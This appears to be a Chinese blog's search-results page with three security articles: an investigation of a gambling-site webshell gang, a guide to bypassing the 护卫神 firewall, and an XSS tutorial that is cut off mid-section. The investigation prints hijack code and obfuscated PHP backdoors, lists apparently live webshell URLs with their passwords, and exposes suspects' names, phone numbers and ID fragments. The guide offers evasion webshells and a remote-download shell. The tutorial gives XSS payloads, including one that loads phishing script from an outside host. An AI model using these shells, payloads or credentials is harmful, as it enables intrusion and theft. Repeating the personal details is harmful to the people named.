搜索到
8
篇与
的结果
-
中国最大的Webshell后门箱子调查,所有公开大马全军覆没 起因对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码set_time_limit(20);error_reporting(0); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i'); define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p()); function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;} if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d看上去是针对360的,通过360去搜索site网站赌博相关的关键字出现的结果我惊呆了!!!!居然非常多的站被劫持,而且其中包括我渗透测试的不少站,看上去像是搜索引擎自己控制的排名一样,其实是非法分子利用了搜索引擎的排名算法规则。通过收录时间发现在2014年开始出现的,也就是说这个问题已经存在了多年之久,至今才暴露出来。接下来我就开展了所有疑问的调查,因为这些东西被利用对社会影响实在太大,不仅仅我是唯一的受害者,而是这个安全圈子的所有人。调查找到幕后团伙 查大马问题 分析团伙的后门特征1.我对我手里的shell进行了一遍梳理,首先是对后门进行新的地址修改,在原来的后门地址放上了js代码,该段代码记录的是相关指纹信息,以及各大网站的json获取。此时就是静静的等待。2.我对大马又进行了一遍分析,把所有代码读烂了也没任何问题,同时也对马进行了抓包分析,没有任何外部请求。因为一直没发现问题,所以我特意进行了长达一周的数据包监控,还是没有任何结果。这时候就非常纳闷,既然马没有问题,为什么人家可以获取到我的所有后门?难道是我的电脑被入侵?我的网络环境除了http之外,不能做任何协议请求,而我的后门都保存在这台linux里,这点也可以排除。只好再想想是不是哪里疏忽了。3.被该团队劫持过的站,我都检查了一遍,之后我发现,每个站的所有文件创建时间都会被他们更新到入侵时间,这刚好符合了特征,也就是刚被他们入侵过的站。如图特征,几乎每个站被入侵后所有创建时间都会更新一次。之后对他们自己的后门进行了采集样本,新的进展出现了,一共发现2波不同的团伙,但使用的大马均为一类。(见附件1)我对他们的马进行了解密审计后发现,他们自己记录大马后门的箱子地址为api.fwqadmin.com,因为有了新的线索,所以只能暂时保存,后面再对这个进行渗透。进展经过两天的等待,终于得到了该团伙的指纹信息以及QQ号,然后我就开启大神模式进行社工,之后基本确认此人真实信息(圈内叫老袁)。然后我申请了一个QQ小号,以匿名的方式加了一些博彩导航网站上的qq,在QQ上问了好几个人,都没有结果,后来我干脆以做博彩的名义和他们进行深度沟通,通过沟通发现该团伙的shell都是收购来的,一个月收入几百万人民币,是否真实就不得而知了。目前基本可以确认我的判断错误,老袁就是唯一的线索。我对被该团伙做劫持的所有站进行了采集,还有跳转到他们导航的域名。首先对那些不是我的站进行了渗透入侵,采集到后门样本,看到里面有个和我类似的大马,但是核心变量结构不一样,我下载回来进行审计抓包同样没问题,后来通过对比特征,发现大马请求的POST参数都是一样的,例如gopwd=密码&godir= ,马都没异常,这时候初步判断是上层网络出现了问题,通过流量提取到大马特征的地址,如果真是这样就太可怕了。我联系到老袁了,和他进行了一些盘问式的沟通,感觉到他很害怕,他说别搞他,他以前做诈骗的。后来发了一些shell地址给我来讨好我,如下列表,下面是星际团队的:http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm Hys7sa5wrKKO00GSBtashras28asNNmsn18 http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ytsadAskLs27ssJsjdasd2sS http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php UTF8 http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ytsadAskLs27ssJsjdasd2sS http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS UUys78tasdRhasd00iasdyTGGgahs http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan 7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google erk12hj3nfher71h3j4k132bnnebr3hg4134 http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com Tmbdcuu123uualltop http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd YIasdwj78954qwtyVVJsarwhahuyrwvsllps2 http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qkos http://www.hotpoll.com.cn/i/index.php?v=111 heiheideheihei星际团队是什么鬼?难不成又是做博彩的?通过与老袁进一步沟通后发现,这些shell都是另一个做博彩的,他说是博彩圈子最大的团伙,说实话,我挺兴奋的,发觉这件事越来越有趣了,我倒想看看这是些什么人。不过现在我的目标还在“老袁”身上,因为我得找到卖他shell的人,经过一番较量之后,我得到到了真相,我也叫他提供了交易证据。此处略去不表,我会放到后面取证部分。虽说有了shell卖家的联系方式,可是迟迟没添加上。这时候我又采取了另一种思路,钓鱼取证,老套路,还是在大马地址上js json,上面贴了几段字《add me email:xxx@xxx.com I will give you all webshell》让老袁发给让他,以便他主动联系我。后来他果真访问了几个webshell的地址,我也抓取到了他的真实PC指纹以及代理的指纹以及QQ昵称。之后他主动找到我,问我是不是星际团队的,并说收到我发的邮件了。这时候我就很好奇了,莫非星际团队也找到他了?然后他就来恐吓我,说要抓你们(星际团队),已经调查了星际团队一年了。这时候我心一想,水真深,查来查去的到底是谁在查谁呢。不过他肯定是瞒不过我的,毕竟我有他卖shell的证据,不过意想不到的是他说:“我背后都是省厅的人,你以为这些shell都是怎么来的?都是在国家机器提取的。”我勒个去,国家会干这种事吗?国家提取网站记录我是信,isp保留日志也是1年,至于批量提取全国网站访问特征拿出来卖这我就不信了,要么就是黑客入侵到了运营商去提取出来的。经过了一些沟通后,他居然一直说我是星际团队,就把我拉黑了。后来我就主动加他说:“你是河北的吧,我已经有你犯罪证据了。”他就怕了,主动加我认怂,还发了打包好的webshell给我。这时候我又惊呆了,这简直是逆天的节奏,居然有上万个webshell和国内所有cms的后台登录密码,其中包括dedecms discuz wordpress emlog ecshop empire jieqi phpmyadmin uchome ucenter php168等几乎是全国所有cms都存在,而且每种的数量去重复都在上万条,我会上传一部分在附件。他说他背后的人的有几十万的discuz后台登录账户密码,我测试了他发我的一些后台,均可以登录,其中信息包括登录的fromhash uid 用户名、密码 、安全问题 、安全答案,而且都是前一天的。到底是什么东西能记录如此多东西而且还没有一点异常。我看到其中也有我使用过大马的很多站,里面还有上万条webshell,其中有大量我的站,还有大量各种类型的大马和不同密码,看样子并非我一个人受害,我进行特征匹配出来,大概有上百人的大马不同特征。而且他发我的只是很小一部分,叫我给他钱才给我更多。这样一想他手里的资源都有几十万条了吧。他说他后面的人是技术团队,还有各种0day,是给国家干的,手里有全国的webshell,如果真是他说的这样,那资源为什么出现在他这里了还拿出来卖?很明显是撒谎怕我查他。我不相信,决定继续调查。经过几天的分析,这波数据和以前wooyun曝光的出来的九宫格(大家可以回溯一下2013年的http://www.dedebox.com/core/centerxxxxx.php)是一样的,我对当时的数据也进行了打包分析,发现这波shell里面还存在部分的重复数据。而当前这个大马和当时九宫格的登录参数特征基本都是在Spider PHP Shell(SPS-)这款代码的基础上修改的,也就是说除了后门本身,这伙人还通过其他渠道来提取的大量webshell,之后通过webshell去运行了记录后台数据的代码写入内存中僵死代码,保持着只要不换服务器就常年不死的状态,这也还是猜想,因为后台数据里面有些站的确是九宫格重复的,如果是九宫格后门的话我就有新方向可查了,以上是我进行的大致分析和调查过程。下面我就不描述过程,就直接提供数据记录以及取证结果,交给警方去完成了。取证以下这几个是团伙一(老袁)跳转到的域名:116305.net 559160.net 618309.net 786077.net 551809.com www.919808.net www.226830.com均出自同一团伙的,只是域名不同,每个站跳转到不同的域名分散风险罢了,其中劫持代码里面的ip都是一样107.182.228.74,看得出来很老练。这几个是模拟蜘蛛抓取劫持内容的bc logo图片地址的ip:210.126.27.70 pic.root1111.com 58.96.179.132 104.202.66.226此团伙工作环境ip,都在马来西亚(时间在10月9-号到10月26号以内的)2016-10-26 13:00:01 ( IP 14.192.210.34 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864 2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864 2016-10-26 13:00:25 ( IP 175.141.34.101 ) 马来西亚Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080 2016-10-24 13:59:17 ( IP 175.136.41.251 ) 马来西亚Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864 2016-10-25 14:28:11 ( IP 175.143.101.241 ) 马来西亚 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864 14.192.211.116 马来西亚 14.192.211.223 马来西亚 175.138.234.137马来西亚工作PC指纹(分析此团伙有5个人):Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色 Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 Windows XP, MSIE 6.0, 1126×800 Windows Server 2003, Chrome 49.0.2623, 1920×1080 Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864此团伙首领信息QQ 474304849 641075512 真实姓名:袁立 重庆人 手机号:15998984721 手机MAC:18:9E:FC:11:2C:70 马来西亚手机号:060136958999他的网站:www.badongedu.com www.7cq.tv(他建立的地方论坛) api.fwqadmin.com(这个是他自己正在使用的大马自己留的后门收信地址)附件会有大马样本有兴趣的可以看看 Email:root@7cq.tv pianziso@163.com在国内的历史IP:222.178.225.146(重庆市 电信) 222.178.201.12(重庆市 电信) 27.11.4.19(重庆市 联通) 27.10.36.56(重庆市 联通) 113.204.194.202(重庆市 联通) 119.84.66.14(重庆市 电信) 61.161.125.77(重庆市巴南区 时代e行线网迷俱乐部李家沱店A/B馆)国内的历史PC信息:mac:90-2b-34-93-ad-73 操作系统:Microsoft Windows XP 显卡:NVIDIA GeForce GT 610 CPU:AMD Athlon(tm) II X4 640 Processor 3325HZ 团伙成员信息就没去调查了,找到他就可以了。 WebShell卖家(一切安好)信息VPN代理 :110.10.176.127 韩国 2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韩国 (自己比特币购买的主机搭建)访问时间10月9号真实IP:2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海网宿科技股份有限公司联通CDN节点 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 27.186.126.196 河北省保定市 电信 真实ip可能性更大浏览器指纹信息 ,一共3个不同的,但应该都是同一个人,可能电脑比较多,因为他有2个QQWindows NT 6.3, Chrome 45.0.2454, 1366×768 真实指纹 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未装 Alexa 工具 Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色, QQ2436449670 3496357182 Telegram:@haorenge888此人现在开的奥迪A8,真是土豪啊,看来赚了不少钱还能逍遥法外,是河北口音即河北人。如要查到webshell来源只有查他的幕后渠道。他与老袁的交易信息:。星际团伙信息使用过的域名:wokeda.cn www.98589.com www.356388.com chuan2828.com cnzzz.pw web-159.com diyi1111.com diyi2222.com diyi3333.com diyi4444.com xinyu55.com hongyihai.com 80268.com 5130898.com maimai789.com zhenyi58.com xwgy999.com统计代码document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>"); var hmt = hmt || []; (function() { var hm = document.createElement("script"); hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s) })(); callJump() } } } if (init_flag == "93989") { call_init_error() }可以通过他们网站的统计代码分析登录的记录马来西亚的ip就是真实ip搜索各大搜索引擎爬取跳转到他们的站,和快照特征,竟然有超过1000个被他们劫持过的网站,其中包括了不少全国最大的新闻网站如ifeng.com china.com.cn,如果警方需要我可以提供列表星际劫持团伙在马来西亚,成员大概6个人左右,团伙渗透的手段包括但不限于鱼叉,社工,爆破,xday,漏洞均会爬虫批量去入侵,每次入侵后喜欢留大量的后门,防止权限掉了。成员分工:二名核心技术渗透人员(其中一名主要负责攻击,入侵大型新闻类型站点。一名主要负责代码审计,以及内部一系列php的开发,包括劫持程序,外兼入侵一些中型权重站点) 一名普通技术渗透(对扫描出漏洞的垃圾站点进行入侵) 二名负责挂劫持代码,如果站掉了就会去恢复 一名负责bc网站上的市场兼财务,收账出帐以及收站核心成员在2015年12月份从马来西亚回中国至2016年2月左右返回马来西亚以上是我通过圈内人员采取一些手段了解到的信息,因为这个团伙安全意识比较高,没得到太多真实信息,但是有一位给他们做过外包的黑客可以顺藤摸瓜星际使用过的QQ :3151094164 最早的时候 著名的美女黑客:YingCracker QQ:253778XXX 984754XXX 113244XXX 手机: 1366XXXX or 13665XXXXX 姓名: 江XX 所在省份: 福建 所在城市: 福州 所在地区: 台江找到这位美女黑客去了解下此团伙的情况应该会有进展他们的后门样本:<?php @$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]); echo 'error';exit;?> <?php @$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e"; @$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter'); @$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt'); @$xRec((array)@$_REQUEST['rretgscr'],@$SOet); ?> <?php if($_GET['jumpvv']){ $tu="TVFsnZG9vcnB5J"; $mzd="10pOwoK"; $fc="Cg"; $tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne"); $nu="pqldmqFsKCRfUE9"; $qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue"); $lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn"); $htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();} ?> <?php @$EuTsNl="p"."r"."eg_r"."epla"."c"."e"; @$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error"); ?> <?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e'; @preg_filter('|.*|e', $_REQUEST['andyzhengs'], ''); ?>部分我直接复制到文件夹里面了收信地址嫌疑人信息这次事件的特征和九宫格类似,因此我对2013年的事件进行了梳理并且对这个人进行了深入调查,可以确认两个人,一定是其中一个人干的。如果不是大马的问题那么也可以从这两个人中来了解到本次后门事件的内情,唯一的不确定性就是箱子的大马看不出任何问题。因为和他们之前后门数据实在太像了,几乎概括了所有的cms,记录的后台有些也是几年前被入侵过的九宫格箱子里面的,至今还在记录着新的内容嫌疑人一:原来的吐司成员spider,也就是spider大马的创始人,当时他也留过后门,追溯起来都是2011年的事情,经过调查,那时候他所公开出去的shell大马就存在后门,而且也被他本人大量利用做游戏劫持收录挂马,传闻在2012年就赚到了几百万身价,后来就一直低调出了大众的视线,在圈子销声匿迹了。不过现在调查有新的发现,他一直在活跃着,在今年其中登录过历史邮箱,续费过后门的收信域名,因为他没办法换域名,换了就收不了shell。 Id: iamspider iamsunchao 真实姓名:孙x 年龄:29岁(不确定) 就读过:自贡荣县富西初级中学 户籍:成都 西昌人 QQ:80937430(真实QQ) 862262949(小号) 历史IP(可能已经过时了) 222.215.38.109(四川省内江市 电信) 61.157.123.56(四川省凉山州西昌市 电信) 222.215.39.131(四川省内江市 (隆昌县)电信) 222.209.198.201(四川省成都市新都区 四川音乐学院附近蓝天云网吧)嫌疑人二:圈内的大神:toby57,曾经和他还打过交道,说是在给国家做事了,有点不太像是这件事的主谋,但是这个dedebox.com域名所有人就是他,而且他的能力足够干这样的事情 邮箱:toby57@163.com 也是他最常用的im 历史ip 171.212.206.46(四川省成都市 电信) 220.166.52.45(四川省绵阳市 电信) 222.209.139.66(四川省成都市 电信) 220.166.52.45(四川省绵阳市 电信) 125.66.99.211(四川省南充市 电信) 61.157.97.82(四川省绵阳市 西南科技大学) 112.192.70.251(四川省南充市 联通) 125.65.97.134(四川省绵阳市 电信) 61.157.97.85 (四川省绵阳市 西南科技大学) 182.139.60.17(四川省成都市 电信) 手机号:15208341433 姓名:杨xx 身份证号:5116211989050625xx(四川省岳池县) 所在城市:乐山 就读过:四川省绵阳市西南科技大学结论目前其实也没什么结论,从何泄漏的全国的所有大马以及各类cms后台后门还是个谜,因为能力太菜了。。。但是我相信这个谜警方可以解开,你们赋有足够的权利和使命去完成打击。否则对网民的危害太大了,那些webshell被拿去做博彩做诈骗危害就很大了,几乎一个菠菜行业一个诈骗行业的黑帽seo源头都来于此,如果不及时阻止危害还会无限扩大。另外要去看被入侵的站点请到360搜索,娱乐场看最新一天收录https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d温馨提示:使用过任何大马的帽子注意检查下自己的shell,看看里面的文件时间是否统一为最近的创建时间ps:附件为webshell部分列表,大约几千条随机copy。传送门:https://1drv.ms/u/s!AhMf1bUbIk7UanjRbtWlwOyebhU部分受害域名列表(这个基数是去重复1W多条,未去重复大概20万条,其中的信息量与附件类似,一个站会记录所有的管理员登录账户密码,包括webshell的存在)传送门:https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZXZuVMX3fw大家在拿到受害列表可以搜索下手里的webshell域名,如果存在那么就注意及时处理掉,以免被不法分子给你造成危害。*原创作者:为了作者安全,已经匿名处理,转载请注明来自FreeBuf(FreeBuf.COM) -
-
过护卫神绕过方法总结 一、马儿篇,都是以前可以过护卫神的马二、注入篇,可以绕过注入的方法三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿一、马儿篇1号<!--?php <br ?--> @eval ($_POST['1']);?> 2号nono<!--?php <br ?--> eval ($_POST [1]) ?> 3号<!--?php $a = str_replace(x,””,”axsxxsxexrxxt”);<br ?--> $a($_POST["c"]); ?> 菜刀直接连,不需要构造连接字符串,密码 c类似于过安全狗的包含方法A.asp版本: 将一句话保存为 XX.jpg 上传后 地址为 …/xxxxxx.jpg 在上传一个 x.asp 内容为 <!–#include file=”../xxxxxx.jpg”–> B.php版本 如果是php的话: <!--?php <br ?--> include “1.htm”; ?>实在不行,还可以下载远程下载马<% Set xPost = CreateObject(“Microsoft.XMLHTTP”) xPost.Open “GET”,”http://www.xxx.com/123/1.txt”,False xPost.Send() Set sGet = CreateObject(“ADODB.Stream”) sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath(“ls.asp”),2 set sGet = nothing set sPOST = nothing %> —————————————————————二、注入篇/*%00*/截断符 select/*%00*/* from admin; —————————————————————三、规则篇可以利用类似:<!--?php <br ?--> $code=’一串base64′; //base64编码 $x=str_replace(‘f’,””,”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换 $a = ‘/a/’;//正则规则 preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,’a’); //正则替换 ?> 方法绕过关键词过滤
-
-
-
-
-
Web攻防系列教程之跨站脚本攻击和防范技巧详解 XSS跨站脚本攻击一直都被认为是客户端Web安全中最主流的攻击方式。因为Web环境的复杂性以及XSS跨站脚本攻击的多变性,使得该类型攻击很难彻底解决。那么,XSS跨站脚本攻击具体攻击行为是什么,又该如何进行有效的防范呢?本文对此进行了有针对性的具体实例分析。跨站脚本攻击(Cross Site Scripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。为了与层叠样式表(Cascading Style Sheets)的缩写CSS区分开,跨站脚本攻击通常简写为XSS。下面这个页面的主要作用是获取用户输入的参数作为用户名,并在页面中显示“欢迎您,XXX”的形式,具体代码如下:<?php $username = $_GET["name"]; echo “<p>欢迎您, “.$username.”!</p>”; ?>正常情况下,用户会在URL中提交参数name的值为自己的姓名,然后该数据内容会通过以上代码在页面中展示,如用户提交姓名为“张三”,完整的URL地址如下:http://localhost/test.php?name=张三 在浏览器中访问时,会显示如下图1所示内容:此时,因为用户输入的数据信息为正常数据信息,经过脚本处理以后页面反馈的源码内容为欢迎您, 张三!但是如果用户提交的数据中包含有可能被浏览器执行的代码的话,会是一种什么情况呢?我们继续提交name的值为 <script>alert(/我的名字是张三/)</script>, 即完整的URL地址为 http://localhost/test.php?name=<script>alert(/我的名字是张三/)</script>在浏览器中访问时,我们发现会有弹窗提示,如下图2所示:那么此时页面的源码又是什么情况呢?源码变成了“欢迎您,<script>// <![CDATA[alert(/我的名字是张三/)// ]]></script>!” 从源代码中我们发现,用户输入的数据中, <script>// <![CDATA[ 与// ]]></script>标签中的代码被浏览器执行了,而这并不是网页脚本程序想要的结果。 这个例子正是最简单的一种XSS跨站脚本攻击的形式,称之为反射型XSS。XSS跨站脚本攻击的分类根据XSS跨站脚本攻击存在的形式及产生的效果,可以将其分为以下三类。一、 反射型XSS跨站脚本攻击反射型XSS脚本攻击即如我们上面所提到的XSS跨站脚本攻击方式,该类型只是简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输出,导致输出的数据中存在可被浏览器执行的代码数据。由于此种类型的跨站代码存在于URL中,所以黑客通常需要通过诱骗或加密变形等方式,将存在恶意代码的链接发给用户,只有用户点击以后才能使得攻击成功实施。二、 存储型XSS跨站脚本攻击存储型XSS脚本攻击是指Web应用程序会将用户输入的数据信息保存在服务端的数据库或其他文件形式中,网页进行数据查询展示时,会从数据库中获取数据内容,并将数据内容在网页中进行输出展示,因此存储型XSS具有较强的稳定性。存储型XSS脚本攻击最为常见的场景就是在博客或新闻发布系统中,黑客将包含有恶意代码的数据信息直接写入文章或文章评论中,所有浏览文章或评论的用户,都会在他们客户端浏览器环境中执行插入的恶意代码。如流行的Bo-Blog程序的早期版本中存在对用户提交评论数据过滤不严导致的XSS跨站脚本攻击漏洞,黑客可以在文章评论中提交插入恶意数据的UBB代码,提交后,Bo-Blog程序会将数据保存至数据库中,当用户浏览该日志时,就会执行插入的恶意代码,如图3所示。三、 基于DOM的XSS跨站脚本攻击基于DOM的XSS跨站脚本攻击是通过修改页面DOM节点数据信息而形成的XSS跨站脚本攻击。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。让我们来针对如下代码进行详细分析:<html> <head> <title>DOM Based XSS Demo</title> <script> function xsstest() { var str = document.getElementById(“input”).value; document.getElementById(“output”).innerHTML = “<img src=’”+str+”‘></img>”; } </script> </head> <body> <div id=”output”></div> <input type=”text” id=”input” size=50 value=”" /> <input type=”button” value=”提交” onclick=”xsstest()” /> </body> </html>以上代码的作用是提交一个图片的URL地址以后,程序会将图片在页面中进行展示,如我们提交百度LOGO图片的地址/Article/UploadPic/2012-12/20121222154728210.gif,那么在页面中展示结果如下图4所示。当用户输入完百度LOGO的地址,点击“提交”按钮后,“提交”按钮的onclick事件会调用xsstest()函数。而xsstest()函数会获取用户提交的地址,通过innerHTML将页面的DOM节点进行修改,把用户提交的数据以HTML代码的形式写入页面中并进行展示。以上例子中输出的HTML代码为<img src=” /Article/UploadPic/2012-12/20121222154728210.gif”></img> 以上情况为正常的用户输入情况,那黑客又是怎么利用该种类型代码实现XSS跨站脚本攻击的呢?黑客可以通过构造如下数据,输入#’ onerror=’javascript:alert(/DOM Based XSS Test/) 在浏览器中提交后,发现代码果然被执行,出现了弹窗提示,如下图5所示。XSS跨站脚本攻击实例以上是针对XSS跨站脚本攻击三种类型的简单介绍。看了上面的描述朋友们或许会想,难道仅仅弹出一个提示框就是XSS跨站脚本攻击了吗?答案当然是否定的,XSS跨站脚本攻击的利用可以实现多种效果,甚至可以说XSS跨站脚本攻击漏洞的利用是一种黑客攻击的艺术,下面我们结合具体实例进行详细的分析和描述,了解一下XSS跨站脚本攻击都能做些什么事情。XSS跨站脚本攻击利用钓鱼目前,网络钓鱼攻击的方式比较多,包括申请注册相似域名,构建相似度高的网站环境和发布虚假中奖信息等,但是以上钓鱼攻击方式针对有一定安全意识的网民来说,很难实现成功的钓鱼攻击。然而通过XSS跨站脚本攻击漏洞进行的钓鱼攻击,即使有一定安全意识的网民,也无法抵御。这里我们以盛大游戏论坛的XSS跨站脚本攻击漏洞利用的钓鱼攻击演示(目前,该漏洞已经修复)。首先,我们需要了解的是,盛大的游戏登录都是使用盛大通行证进行登录的,而盛大的游戏论坛也是使用盛大通行证进行登录,所以,如果黑客通过盗取游戏玩家登录论坛时的信息,就相当于盗取了玩家游戏账号和密码。盛大的游戏论坛就存在XSS跨站脚本攻击漏洞,使得黑客可以通过该漏洞获取用户的账号和密码。存在过滤不严的位置为用户资料中的个人主页部分,通过在个人主页栏中输入如下代码:http://” STYLE=’a:expression(document.write(“<s\143ript language=javas\143ript src=http://www.123.com/1.jpg Charset=GB23></s\143ript>”))’ target=_blank然后利用该账号在论坛中发帖子或回复,这样当其他玩家访问我们发布或回复的帖子时,就会执行我们插入的恶意代码。http://www.123.com/1.jpg就是我们构造的恶意代码,这个代码是我们用来钓鱼的页面,如下图6所示:显示的内容和盛大官方游戏论坛登录的页面一样,如果不通过查看网页源代码的方式是无法从页面显示中看出任何问题的,当玩家输入通行证账号和密码信息并点击登录时,账号提交的地址不是盛大的服务器,而是黑客的服务器。从源码中,可以看到账号和密码发送到的黑客服务器账号接收程序的地址,如下图7所示:XSS跨站脚本攻击盗取用户Cookie信息通过XSS跨站脚本攻击盗取用户Cookie信息一直是XSS跨站脚本攻击漏洞利用的最主流方式之一。当用户正常登录Web应用程序时,用户会从服务端得到一个包含有会话令牌的cookie:Set-Cookie: 